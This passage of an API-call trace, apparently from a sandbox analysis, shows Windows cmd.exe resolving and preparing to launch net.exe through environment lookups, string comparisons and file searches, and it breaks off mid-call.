lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.904] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.904] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.904] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.904] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.904] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.905] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.905] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.905] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.905] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.905] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.905] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.905] GetProcessHeap () returned 0x3d0000 [0068.905] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e2b28 | out: hHeap=0x3d0000) returned 1 [0068.905] GetEnvironmentStringsW () returned 0x3e2268* [0068.905] GetProcessHeap () returned 0x3d0000 [0068.905] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xae2) returned 0x3e4bc8 [0068.905] FreeEnvironmentStringsW (penv=0x3e2268) returned 1 [0068.905] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.905] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.905] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.905] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.905] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.905] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.905] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.905] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.905] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.905] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.905] GetProcessHeap () returned 0x3d0000 [0068.905] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x54) returned 0x3e56b8 [0068.905] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af7dc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.906] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1af7dc, lpFilePart=0x1af7d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1af7d8*="Desktop") returned 0x25 [0068.906] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.906] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af558 | out: lpFindFileData=0x1af558*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3e1ed0 [0068.906] FindClose (in: hFindFile=0x3e1ed0 | out: hFindFile=0x3e1ed0) returned 1 [0068.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1af558 | out: lpFindFileData=0x1af558*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3e1ed0 [0068.906] FindClose (in: hFindFile=0x3e1ed0 | out: hFindFile=0x3e1ed0) returned 1 [0068.906] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1af558 | out: lpFindFileData=0x1af558*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3e1ed0 [0068.906] FindClose (in: hFindFile=0x3e1ed0 | out: hFindFile=0x3e1ed0) returned 1 [0068.906] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.906] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.906] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.906] GetProcessHeap () returned 0x3d0000 [0068.907] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e4bc8 | out: hHeap=0x3d0000) returned 1 [0068.907] GetEnvironmentStringsW () returned 0x3e40d8* [0068.907] GetProcessHeap () returned 0x3d0000 [0068.907] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb36) returned 0x3e5f18 [0068.907] FreeEnvironmentStringsW (penv=0x3e40d8) returned 1 [0068.907] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.907] GetProcessHeap () returned 0x3d0000 [0068.907] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e56b8 | out: hHeap=0x3d0000) returned 1 [0068.907] GetProcessHeap () returned 0x3d0000 [0068.907] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400e) returned 0x3e6a58 [0068.907] GetProcessHeap () returned 0x3d0000 [0068.907] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4c) returned 0x3e2da8 [0068.907] GetProcessHeap () returned 0x3d0000 [0068.907] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e6a58 | out: hHeap=0x3d0000) returned 1 [0068.907] GetConsoleOutputCP () returned 0x1b5 [0069.450] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.450] GetUserDefaultLCID () returned 0x409 [0069.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af91c, cchData=128 | out: lpLCData="0") returned 2 [0069.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af91c, cchData=128 | out: lpLCData="0") returned 2 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af91c, cchData=128 | out: lpLCData="1") returned 2 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.451] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.453] GetProcessHeap () returned 0x3d0000 [0069.453] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x20c) returned 0x3e2e00 [0069.453] GetConsoleTitleW (in: lpConsoleTitle=0x3e2e00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.453] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.453] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.453] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.453] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.454] GetProcessHeap () returned 0x3d0000 [0069.454] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400a) returned 0x3e6a58 [0069.454] GetProcessHeap () returned 0x3d0000 [0069.454] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e6a58 | out: hHeap=0x3d0000) returned 1 [0069.454] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.454] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.454] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.454] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.454] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.454] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.454] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.454] GetProcessHeap () returned 0x3d0000 [0069.454] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3018 [0069.454] GetProcessHeap () returned 0x3d0000 [0069.454] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x10) returned 0x3dff28 [0069.455] GetProcessHeap () returned 0x3d0000 [0069.455] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x42) returned 0x3e3078 [0069.456] GetConsoleTitleW (in: lpConsoleTitle=0x1af614, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.456] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.456] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.456] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.456] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.457] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.457] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.457] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.457] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.457] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.457] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.457] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.457] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.457] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.457] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.457] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.457] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.457] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.457] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.457] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.457] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.457] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.457] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.457] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.457] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.457] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.457] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.457] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.457] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.457] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.457] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.457] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.457] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.457] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.457] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.457] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.457] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.457] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.457] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.457] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.458] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.458] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.458] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.458] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.458] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.458] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.458] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.458] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.458] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.458] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.458] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.458] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.458] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.458] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.458] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.458] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.458] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.458] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.458] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.458] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.458] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.458] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.458] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.458] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.458] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.458] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.458] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.458] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.458] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.458] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.458] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.458] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.458] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.458] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.458] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.458] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.459] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.459] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.459] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.459] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.459] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.459] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.459] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.459] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.459] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.459] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.459] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.459] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.459] GetProcessHeap () returned 0x3d0000 [0069.459] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3e30c8 [0069.459] GetProcessHeap () returned 0x3d0000 [0069.459] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4a) returned 0x3e32e0 [0069.459] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.459] GetProcessHeap () returned 0x3d0000 [0069.459] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x418) returned 0x3d07f0 [0069.459] SetErrorMode (uMode=0x0) returned 0x0 [0069.459] SetErrorMode (uMode=0x1) returned 0x0 [0069.459] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3d07f8, lpFilePart=0x1af134 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1af134*="Desktop") returned 0x25 [0069.460] SetErrorMode (uMode=0x0) returned 0x1 [0069.460] GetProcessHeap () returned 0x3d0000 [0069.460] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3d07f0, Size=0x5c) returned 0x3d07f0 [0069.460] GetProcessHeap () returned 0x3d0000 [0069.460] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3d07f0) returned 0x5c [0069.460] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.460] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.460] GetProcessHeap () returned 0x3d0000 [0069.460] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x120) returned 0x3e3338 [0069.460] GetProcessHeap () returned 0x3d0000 [0069.460] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x238) returned 0x3d0858 [0069.466] GetProcessHeap () returned 0x3d0000 [0069.466] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3d0858, Size=0x122) returned 0x3d0858 [0069.466] GetProcessHeap () returned 0x3d0000 [0069.466] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3d0858) returned 0x122 [0069.466] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.466] GetProcessHeap () returned 0x3d0000 [0069.466] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xe0) returned 0x3e3460 [0069.467] GetProcessHeap () returned 0x3d0000 [0069.467] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e3460, Size=0x76) returned 0x3e3460 [0069.467] GetProcessHeap () returned 0x3d0000 [0069.467] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e3460) returned 0x76 [0069.467] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.467] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1aeeb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeeb0) returned 0xffffffff [0069.468] GetLastError () returned 0x2 [0069.468] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x1aeeb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeeb0) returned 0xffffffff [0069.468] GetLastError () returned 0x2 [0069.468] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.468] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1aeeb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeeb0) returned 0x3e34e0 [0069.468] GetProcessHeap () returned 0x3d0000 [0069.468] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x14) returned 0x3e3520 [0069.468] FindClose (in: hFindFile=0x3e34e0 | out: hFindFile=0x3e34e0) returned 1 [0069.468] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x1aeeb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeeb0) returned 0xffffffff [0069.468] GetLastError () returned 0x2 [0069.468] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aeeb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeeb0) returned 0x3e34e0 [0069.468] GetProcessHeap () returned 0x3d0000 [0069.468] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e3520, Size=0x4) returned 0x3e3520 [0069.468] FindClose (in: hFindFile=0x3e34e0 | out: hFindFile=0x3e34e0) returned 1 [0069.469] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.469] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.469] GetConsoleTitleW (in: lpConsoleTitle=0x1af3a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.469] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af230, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af2f8 | out: lpAttributeList=0x1af230, lpSize=0x1af2f8) returned 1 [0069.469] UpdateProcThreadAttribute (in: lpAttributeList=0x1af230, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af2f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af230, lpPreviousValue=0x0) returned 1 [0069.469] GetStartupInfoW (in: lpStartupInfo=0x1af1ec | out: lpStartupInfo=0x1af1ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.469] GetProcessHeap () returned 0x3d0000 [0069.469] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x18) returned 0x3e34e0 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.469] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.470] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.470] GetProcessHeap () returned 0x3d0000 [0069.470] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e34e0 | out: hHeap=0x3d0000) returned 1 [0069.470] GetProcessHeap () returned 0x3d0000 [0069.470] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xa) returned 0x3dff40 [0069.470] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.471] CreateProcessW (in: 